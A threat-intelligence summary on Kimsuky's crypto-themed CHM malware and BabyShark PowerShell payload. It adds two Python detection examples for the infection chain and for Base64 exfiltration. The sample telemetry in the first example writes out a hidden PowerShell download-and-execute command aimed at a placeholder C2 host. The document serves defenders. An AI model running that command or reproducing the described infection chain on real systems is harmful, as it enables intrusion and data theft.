✅ Report Title: Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme
The S2W Threat Intelligence Center has published an analytical report on CHM and BabyShark malware leveraging cryptocurrency themes, attributed to the North Korea-backed APT group Kimsuky.
✅ Executive Summary:
1. Summary
- On May 26, 2025, during continuous tracking of the Kimsuky group, S2W’s Threat Intelligence Center TALON identified and analyzed CHM and BabyShark malware disguised with cryptocurrency-related themes.
- The CHM malware uses the Windows Compiled HTML Help (CHM) format and executes PowerShell commands via JavaScript embedded within HTML files, which then download and run additional scripts from a C2 server.
- The downloaded PowerShell script was identified as a BabyShark variant capable of exfiltrating host information, process data, file directories, and keystrokes from infected systems.
📌 Key Malware File Information: CHM Malware (wallet.chm)
This file uses Microsoft’s CHM (Compiled HTML Help) format and contains a malicious HTML file. When the user opens the CHM file and clicks the 'National Tax Law' section, `page_1.html` is executed via the `wallet.hhc` file.
The HTML includes a script that creates and executes a shortcut object (.lnk) using ActiveX controls. It stores an encoded PowerShell command in `Link.dat`, which is then decoded via the `certutil` command to generate a `Link.ini` file in the same directory.
`Link.ini` is then executed using `wscript.exe`, leading to the download and execution of additional scripts from a C2 server. This C2 infrastructure was found to be hosted on a compromised server belonging to a domestic electronics manufacturing and repair company.
Notably, the execution interface was identical to a CHM malware sample attributed to Kimsuky observed in March 2025, although the C2 URLs used for payload delivery were different, indicating a shift in infrastructure.
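One way to turn the execution chain described above into a detection, as an added example that is not part of the S2W report: the Python below walks Sysmon-style process-creation events and flags `certutil -decode`, `wscript.exe` launched on a non-script extension such as `.ini`, and download-capable PowerShell whenever `hh.exe` (the Windows HTML Help viewer that opens CHM files) is in the process ancestry. The event field names, pids, paths and the placeholder C2 host are constructed assumptions for this example, not values from the report.

```python
import re

# Constructed sample telemetry modelled on Sysmon Event ID 1 (ProcessCreate).
# Field names, pids, paths and the C2 host are assumptions for this example.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\user\Downloads\wallet.chm'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -decode Link.dat Link.ini"},
    {"pid": 400, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe Link.ini"},
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c iex((New-Object Net.WebClient)"
                ".DownloadString('http://c2-placeholder.invalid/?query=1'))"},
    # Benign certutil use from an ordinary shell; must not be flagged.
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify cert.cer"},
]

# Child behaviours that are suspicious when they descend from the HTML Help
# viewer (hh.exe); each pattern is matched against the child's command line.
SUSPICIOUS_CHILDREN = {
    "certutil.exe":   re.compile(r"-decode\b", re.I),
    "wscript.exe":    re.compile(r"\.(ini|dat|txt)\b", re.I),
    "powershell.exe": re.compile(
        r"downloadstring|downloadfile|\biex\b|invoke-expression", re.I),
}


def basename(image):
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Image basenames of the processes above pid, nearest parent first.
    Stops on missing parents or pid reuse loops."""
    chain = []
    seen = {pid}
    current = by_pid.get(pid)
    while current is not None:
        parent = by_pid.get(current["ppid"])
        if parent is None or parent["pid"] in seen:
            break
        seen.add(parent["pid"])
        chain.append(basename(parent["image"]))
        current = parent
    return chain


def detect_chm_chain(events):
    """Return (pid, image basename, reason) for every process whose command
    line matches a suspicious pattern and whose ancestry contains hh.exe."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        pattern = SUSPICIOUS_CHILDREN.get(name)
        if pattern is None or not pattern.search(e["cmdline"]):
            continue
        if "hh.exe" in ancestors(by_pid, e["pid"]):
            findings.append((e["pid"], name,
                             "%s spawned under hh.exe: %s" % (name, e["cmdline"])))
    return findings


if __name__ == "__main__":
    for pid, name, reason in detect_chm_chain(SAMPLE_EVENTS):
        print(pid, reason)
```

Requiring `hh.exe` in the ancestry rather than as the direct parent matters here: the PowerShell download runs under `wscript.exe`, one hop below the help viewer, and a parent-only rule would miss it while still flagging routine `certutil` use from an admin shell.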
📌 Additional Payload: BabyShark Malware
The script downloaded with the `query=1` parameter was identified as a variant of BabyShark malware linked to the Kimsuky group.
This malware collects the following data from infected systems:
- System information (computer name, owner, manufacturer, model, system info, OS, CPU, etc.)
- Directory and file listings
- List of currently running processes
- Information on installed antivirus software
Collected data is Base64-encoded and exfiltrated via HTTP POST requests. The malware also downloads and executes additional payloads.
These payloads receive further commands from the C2 server via PowerShell and execute them using the `Win32_ProcessStartup` object to hide the process window.
📌 Additional Payload: User Monitoring Script
The PowerShell script retrieved using the `idx=5` parameter captures clipboard contents and keystrokes. To prevent duplicate execution, it creates a mutex named `GlobalAlreadyRunning19122345` and periodically sends stolen data to the C2 server.
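A complementary network-side check for the Base64-encoded HTTP POST exfiltration described above, again as an added example rather than code from the report: the Python below takes constructed proxy-log records, decodes POST bodies that look like Base64 (including unpadded and URL-safe variants), discards anything that is not text, and flags bodies containing several of the host-information field names the report says BabyShark collects. The records, host names, marker list and threshold are assumptions made for this example.

```python
import base64
import binascii
import re

# Field names typical of collected host information; the list and the
# two-marker threshold are tuning assumptions for this example.
HOST_INFO_MARKERS = ("computer name", "manufacturer", "model",
                     "os name", "antivirus", "process")

# Constructed host-information blob of the kind the report describes.
CONSTRUCTED_HOST_INFO = (
    "Computer Name: DESKTOP-TEST01\r\nManufacturer: ExampleCorp\r\n"
    "Model: Model-1\r\nOS Name: Microsoft Windows 10 Pro\r\n"
    "Antivirus: Windows Defender\r\nProcess list: explorer.exe, powershell.exe\r\n"
)

# Constructed proxy-log records as (method, url, body); hosts are placeholders.
SAMPLE_RECORDS = [
    ("GET",  "http://c2-placeholder.invalid/?query=1", ""),
    ("POST", "http://c2-placeholder.invalid/",
     base64.b64encode(CONSTRUCTED_HOST_INFO.encode()).decode()),
    ("POST", "https://api.example.com/v1/events", '{"event":"login","ok":true}'),
    ("POST", "https://cdn.example.com/upload",           # binary payload
     base64.b64encode(bytes(range(256))).decode()),
    ("POST", "https://forum.example.com/post",           # harmless text
     base64.b64encode(b"Just a normal message").decode()),
]

_B64_ALPHABET = re.compile(r"[A-Za-z0-9+/=_-]+")


def decode_base64_text(body):
    """Return the decoded text if body is Base64 that decodes to mostly
    printable text, otherwise None. Tolerates missing padding and the
    URL-safe alphabet."""
    stripped = body.strip()
    if not stripped or not _B64_ALPHABET.fullmatch(stripped):
        return None
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        if "-" in padded or "_" in padded:
            raw = base64.b64decode(padded, altchars=b"-_")
        else:
            raw = base64.b64decode(padded)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not text:
        return None
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if printable / len(text) > 0.95 else None


def flag_exfil(records, min_markers=2):
    """Return (url, matched markers) for POST bodies whose Base64-decoded
    text contains at least min_markers host-information field names."""
    findings = []
    for method, url, body in records:
        if method.upper() != "POST":
            continue
        text = decode_base64_text(body)
        if text is None:
            continue
        lowered = text.lower()
        hits = [m for m in HOST_INFO_MARKERS if m in lowered]
        if len(hits) >= min_markers:
            findings.append((url, hits))
    return findings


if __name__ == "__main__":
    for url, hits in flag_exfil(SAMPLE_RECORDS):
        print(url, "->", ", ".join(hits))
```

Decoding before matching is the point: the same marker scan on the raw request body would see only Base64 and miss the record, and the printability gate keeps legitimately Base64-wrapped binary uploads from producing false positives.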
✅ Recommended Threat Detection and Mitigation Actions:
- Kimsuky continues to distribute malware using cryptocurrency themes, so continued monitoring is advised. It is recommended to inspect for, and block access to, the related C2 domains and URLs.
- Additional reports on Kimsuky activity are available for reference.
- Quick Overview of Babyshark Campaign disguise as Defense-themed HWP Document, involving the Kimsuky APT Group
- The North Korea-backed Kimsuky's New Golang Stealer 'Troll' and 'GoBear' Backdoor Target South Korea
👉 Contact us: https://s2w.inc/en/contact
*The full report is available upon request and for QUAXAR subscribers.